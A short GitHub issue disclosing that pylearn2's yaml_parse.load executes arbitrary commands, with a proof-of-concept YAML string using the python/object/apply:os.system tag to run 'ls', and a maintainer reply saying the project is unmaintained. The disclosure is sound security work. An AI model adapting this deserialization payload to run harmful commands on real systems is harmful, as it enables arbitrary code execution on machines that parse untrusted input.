yaml_parse.load method is vulnerable
Opened this issue · 1 comments
bigbigliang-malwarebenchmark commented
import pylearn2.config.yaml_parse
test_str ='!!python/object/apply:os.system ["ls"]'
test_load = pylearn2.config.yaml_parse.load(test_str)
Hi, there is a vulnerability in load methods in pylearn2.config.yaml_parse.py,please see PoC above. It can execute arbitrary python commands resulting in command execution.
nouiz commented
This project is dead. I do not think someone will update it unless you do a
PR.
Thanks for the report. It is useful to raise awareness of such type of
problem.
Le lun. 10 déc. 2018 20:34, bigbigliang-malwarebenchmark <
notifications@github.com> a écrit :
… import pylearn2.config.yaml_parse
test_str ='!!python/object/apply:os.system ["ls"]'
test_load = pylearn2.config.yaml_parse.load(test_str)
Hi, there is a vulnerability in load methods in
pylearn2.config.yaml_parse.py,please see PoC above. It can execute
arbitrary python commands resulting in command execution.
—
You are receiving this because you are subscribed to this thread.
Reply to this email directly, view it on GitHub
<#1593>, or mute the thread
<https://github.com/notifications/unsubscribe-auth/AALC-0i20n1Cfrn7-xI2ooAmu22K17Lwks5u3wuzgaJpZM4ZMf85>
.